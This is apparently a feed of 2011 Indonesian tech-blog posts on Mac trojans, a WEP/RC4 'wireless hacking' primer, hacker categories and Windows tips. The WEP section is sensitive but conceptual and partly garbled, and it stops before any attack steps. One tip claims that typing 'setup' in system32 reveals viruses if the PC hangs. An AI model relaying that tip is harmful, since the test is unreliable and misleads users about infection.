Demikian, semoga beberapa informasi ini dapat dijadikan referensi bagi kalangan admin jaringan untuk lebih peduli dalam mengamankan sistem jaringan dan komputer mereka.

Sistem Operasi Macintosh Kini Bertambah Buruk dan Menjadi Bulan Bulanan Virus Trojan

noreply@blogger.com (ROCHIM-TECH) — Mon, 07 Nov 2011 04:50:00 +0000

Sejumlah virus baru menyerang sistem operasi Mac. Ancaman berbentuk Trojan itu telah terdeteksi oleh antivirus ESET baru-baru ini. Trojan pertama adalah OSX/Revir.A dan OSX/Imuler.A. Keduanya menarik karena tampil dalam bentuk file PDF.
Target mereka adalah komputer Macintosh berbahasa mandarin. File pdf pada Trojan memuat tulisan bernuansa politik, terkait sengketa wilayah Kepulauan Diayou antara Cina dan Jepang.
Modus Trojan anyar itu adalah menginstal dirinya sendiri ketika korban memusatkan perhatian pada file PDF yang berisi soal sengketa itu.
Yudhi Kukuh, Technical Consultant dari ESET Indonesia, mengatakan Trojan yang tampil sebagai PDF adalah modus umum pada sistem operasi Windows. “Biasanya akan terlihat sebagai .pdf.exe. Dengan file extension ganda akan membuatnya menjadi semakin lihai bersembunyi,” ujar dia.
Namun, pada komputer Mac, serangan seperti itu terbilang baru. “Para pengguna Mac harus selalu waspada dengan kehadiran file berwujud PDF karena muatannya akan berbeda dengan PDF pada umumnya,” kata Yudhi kepada Tempo, kemarin.
Pada saat pengguna Mac berbahasa Mandarin sibuk mengurus Trojan OSX/Revir.A dan OSX/Imuler.A, beberapa hari kemudian telah muncul ancaman lain pada komputer Apple berbasis Mac OS X Lion (10.7). Virus itu teridentifikasi sebagai OSX/Flashback.A. Ia pun tergolong Trojan.
Modus OSX/Flashback.A adalah menginstal dirinya melalui installer Adobe Flash palsu yang terunduh dari situs Internet atau situs yang khusus mendistribusikan aplikasi Mac.
Flashback akan menyerang pengguna yang sering menggunakan situs jejaring sosial untuk menarik pengguna tersebut agar men-download dan akhirnya ia akan terinstal. Ia akan meminta korban menyaksikan konten tertentu. Lalu korban harus memilih untuk menginstal Flash Player.

Trik Cek Virus Cepat Tanpa Software

noreply@blogger.com (ROCHIM-TECH) — Wed, 26 Oct 2011 09:45:00 +0000

Mau tau cara mengecek virus dengan mudah dan tanpa software tambahan?
Berikut tips dan trik mengecek virus ada atau tidak di komputer Anda :
1. Buka command prompt dengan cara Start -> Run -> cmd, Secara default, lokasi akan berada di C:\Documents and settings\nama_user, untuk itu anda harus pindah terlebih dahulu ke folder system32.

2. Ketikkan "cd c:\windows\system32" (tanpa tanda petik) seperti pada gambar. Tekan enter untuk masuk ke folder system32.

3. Ketik "setup" lalu tekan enter

4. Jika muncul tampilan seperti gambar berikut yang didalamnya ada peringatan "Please go to the Control Panel to install and configure system components." Berarti komputer anda sehat dari virus, tetapi jika komputer anda hang atau restart itu berarti ada virus yang bersembunyi di komputer anda.

Wireless Hacking Tutorial

noreply@blogger.com (ROCHIM-TECH) — Sat, 15 Oct 2011 10:27:00 +0000

WEP adalah Wired Equivalent Privacy. Ini merupakan standar untuk enkripsi nirkabel sampai sekarang. Banyak orang bahkan tidak menggunakan WEP karena keamanan yang lemah, repot, atau WEP sangat pointless, karena bisa dicrack, walaupun biasanya memakan waktu cukup lama untuk memperoleh cukup data untuk mendapatkan password WEP, terutama password yang sangat panjang.
WEP terdiri dari password rahasia dan enkripsi. Password rahasia yang digunakan bersama antara akses point dan semua orang di jaringan nirkabel, terdiri dari 5 atau 13 karakter. Digunakan oleh proses enkripsi untuk komunikasi paket yang disamarkan sepanjang WLAN, atau Wireless Local Area Network. Semua paket yang unik dan acak, jadi jika seseorang melakukan crack pada satu paket key, mereka tidak dapat melihat apa yang dilakukan orang lain tanpa melakukan cracking pada mereka juga.
Ini semua dilakukan dengan menggunakan password rahasia bersamaan dengan tiga karakter (the Initialization Vector, atau IV) yang dipilih secara acak oleh perangkat nirkabel. Misalnya, jika Anda adalah password “hello”, mungkin membuat “abchello” untuk satu paket, dan “xyzhello” untuk lainnya.
WEP juga menggunakan XOR, atau Eksklusif ATAU, untuk enkripsi. XOR membandingkan dua bit, dan jika theyre berbeda, ia akan mengembalikan 1. Jika tidak, ia akan mengembalikan 0. Misalnya, 1 XOR 1 akan 0, dan 1 XOR 0 akan 1.
Array adalah variabel yang dapat menyimpan beberapa nilai. Misalnya, array abjad [26] akan terus nilai 26, yang diberi label 0 melalui 25.
Contoh:
alphabet[0] = ‘A’;
alphabet[1] = ‘B’;
void swap(char &first, char &second)
{
char temp = first;
first = second;
second = temp;
}
swap(alphabet[0], alphabet[1]);
Jika nilai-nilai array swapped randomely telah berkali-kali, maka tidak mungkin dikirim ke array elemen yang memegang nilai.
Algoritma yang sebenarnya digunakan oleh WEP untuk mengenkripsi paket yang adalah RC4. RC4 terdiri dari dua langkah: dengan password dan Penjadwalan Algoritma Pseudo Random Generasi Algoritma. Bagian pertama, yang Penjadwalan Algoritma password, atau KSA, seperti ini dalam kode C, assuming k [] adalah array dari password rahasia:
int n = 256;
char s[n];
// initialization
for (int i = 0; i <= (n – 1); i++) s[i] = i; int j = 0; // scrambling for (int l = 0; l <= (n – 1); l++) { j += s[l] + k[l]; swap(s[l], s[j]); }

Antara Hacker, Cracker, Phresker, Defacer, Script Kiddies, Hacker Wannabe, dan Newbie

noreply@blogger.com (ROCHIM-TECH) — Sat, 15 Oct 2011 10:14:00 +0000

1.Hacker

Hacking adalah sebuah seni ketrampilan mengoperasikan/mengendalikan/menguasai komputer mencakup semua aspek mulai dari level dasar sampai level tertinggi baik dalam komputerisasi dasar, pemrograman dasar sampai dengan jaringan yang sangat rumit. Sedangkan orang yang mampu melakukan itu semua di beri julukan “hacker”. Hacker umumnya JUSTRU tidak sangat ingin di publikasikan apalagi sampai menggembar-gemborkan dirinya adalah hacker. Justru hacker cenderung diam dan tertutup dengan status sosial yang sangat normal. Bahkan sangat tidak mungkin anda sangka seseorang yang pendiam dan lugu bahkan culun adalah seorang hacker (bukan berarti semuanya). Hacker umum-nya tidak merusak, mereka kebanyakan mencari informasi/data penting tingkat tinggi bukan untuk mencuri/kesenangan tapi lebih cenderung untuk mengetes, bukan mengetes kemampuan mereka tapi system yang sedang mereka hadapi. Kebanyakan hacker tidak sangat mudah di kalahkan mereka mampu menguasai dan memutar balik keadaan karena mereka bisa di anggap satu level dengan system… Jadi kalau ada yang teriak “HAI SAYA INI HACKER” apakah dia memang masuk kategori hacker ataukah malah masuk kategori lain-nya yang lebih spesifik?

2.Cracker

Cracker bisa dikategorikan sebagai orang yang memehami jenis pemrograman tingkat tinggi dan sedikit pengetahuannya tentang jaringan. Umumnya kebanyakan cracker membuat kemampuan untuk sebuah program untuk men-disfungsikan atau me-manipulasi jalur yang seharusnya. Contohnya: Cracker membuat sebuah program agar program yang seharunya bayar menjadi GRATIS. Cracker tidak terlalu memahami seluk beluk jaringan. Umumnya mereka cenderung menyukai segala sesuatu yang bersifat GRATISAN.

3.Defacer

Pernah ada suatu kasus, saya melihat orang yang dengan bangganya memamerkan nama panggilannya di dalam sebuah website milik orang lain. Lau orang itu berkata “website itu sudah saya hack lho!”. Defacer pada umumnya adalah orang iseng yang sedang ingin mencoba mencari tau baik dai segi ilmu, kemampuan, dan jati diri. Kebiasaan yang mudah diketahui dari mereka adalah mereka gemar merubah tampilan utama website, menggunakan/ memanfaatkan kelemahan/ kecacatan dalam sebuah program. Defacer umumnya tidak begitu memahami tentang level pemrograman, mereka lebih cenderung memahami tenyang kinerja sebuah webserver beserta script yang ada di dalamnya.

4.Phreaker

Mungkin jarang sekali orang di Indonesia mendengar kata ini. Phreaker ini sebenarnya hampir mirip dengan cracker, karna mereka lebih cenderung suka terhadap GRATISAN. Bedanya, phreaker lebih fokus ke dalam bug jaringan/ telekomunikasi. Contoh: mudahnya orang bisa menelpon/ internetan via hp (bukan karena wifi) secara gratis, padahal seharusnya kan bayar. Atau contoh lainnya: seseorang menggunakan blug yang ada di dalam sebuah perusahaan telekomunikasi (meskipun tidak diketahui bocornya informasi tersebut hasil sendiri atau diberi tau orang dalam). Itu adalah salah satu kegiatan phreaking, dan pelakunya adalah phreaker.

5.Hacker Wannabe

Hacker wannabe ini sangat banyak dan mudah sekali ditemukan di Indonesia. Sebenarnya hacker wannabe ini lebih cenderung ke psikologi, dimana para hacker wannabe ini melakukan sesuatu yang ‘gila’ dan di luar kenormalan baik di dalam cakupan kemampuannya maupin di luar kemampuannya dengan tujuan mendapatkan pengakuan “hebat” dan “mampu” dari orang sekitarnya. Sebagai contoh: ada teman anda yang mengaku – ngaku bisa hacking facebook, yahoo, dsb. Merekalah yang disebut hacker wannabe.

6.Scipt Kiddies

Script kiddies ini juga banyak dan mudah sekali ditemukan di Indonesia. Pada umumnya, script kiddies terlalu banyak bicara blablabla tanpa mengetahui dasar apa yang dia lakukan. Script kiddies bisa dimasukkan ke kategori advanced user dimana keahliannya masih tahap “menggunakan” bukan “menemukan” apalagi sampai ke tahap “menciptakan”. Kebanyakan manusia yang bergaya script kiddies adalah para defacer yang gemar merubah tampilan website orang lain dengan menggunakan program bisnis/ software yang bukan buatannya/ hasil pemikiran sendiri.

7.Scammer

Scammer cenderung menyukai penipuan/ manipulasi/ generalisasi kartu kredit demi mendapatkan barang kesukaanya. Hampir sama dengan cracker/ phreaker, namun sangat ceroboh dan bodoh. Umumnya scammer (istilah Indonesia-nya flauder) ini memahami tentang seluk beluk jaringan namun sangat buta terhadap pemrograman dan keamanan.

8.Newbie

Group newbie ini memang benar – benar pemula alias orang yang baru menggunakan komputer. Kebanyakan newbie ini bisa berkembang menjadi Hacker, Phreaker, Cracker, Scammer, Defacer, Script Kiddies atau Hacker Wannabe.

Urutan kategori berdasarkan tingkat kemampuan dan bahaya reputasinya:

1.Hacker

2.Phreaker

3.Cracker

4.Scammer

5.Defacer

6.Script Kiddies

7.Hacker Wannabe

8.Newbie

Trik Cepat Atasi Komputer Nge-Hang

noreply@blogger.com (ROCHIM-TECH) — Sat, 15 Oct 2011 10:12:00 +0000

Jika komputer Anda mengalami hang atau ‘not responding’, maka ada cara cepat untuk mengatasinya. Selain dengan CTRL+ALT+Del, ada satu cara cepat untuk kill process atau end task program yang sedang bermasalah tersebut. Anda bisa menggunakan trik membuat shortcut di komputer. Beriut langkahnya :

Klik kanan pada layar kosong di desktop, klik New --> Shortcut
Pada kolom type the location of the item copy dan paste kode ini : taskkill.exe /f /fi “status eq not responding
Klik Next, klik Finish.

Tips Agar Flashdisk Kebal dari Virus

noreply@blogger.com (ROCHIM-TECH) — Sat, 15 Oct 2011 10:08:00 +0000

Mencegah flashdisk Anda terkena virus dengan melakukan beberapa trik mudah berikut ini :

1. Masukkan flashdisk ke port komputer atau laptop
2. Buat satu folder di drive flashdisk Anda.
3. Beri nama folder tersebut dengan nama autorun.inf
4. Buka folder tersebut, dan buat aplikasi Notepad di dalamnya di Start->All Programs->Accessories
5. Beri nama file sembarang untuk file Notepad tersebut
6. Buka program Character Map di Start->All Programs->Accessories->System Tools
Pilih huruf yang berlabel Unicode, seperti Arial Unicode atau Lucida Sans Unicode, atau huruf Jepang, China dan karakter aneh lainnya.
7. Pilih beberapa karakter, bisa 4 atau 5 buah, lalu tekan Ctrl+C untuk copy karakter aneh tersebut
8. Rename file Notepad tersebut atau tekan F2 , dan paste karakter aneh yang sudah di-copy tadi untuk mengganti nama file Notepad tersebut
9. Nama file Notepad akan berganti menjadi karakter aneh atau kotak-kotak, dan selesai.

Dalam system operasi Windows, tidak diperbolehkan terdapat 2 nama file yang sama, sehingga kemungkinan besar virus tidak bisa memakai nama file autorun.inf tersebut. Jikalau virus ingin menggantinya, rata-rata virus belum mengenal karakter Unicode, sehingga tampak sulit untuk mengubahnya, dan flashdisk Anda pun aman dari virus.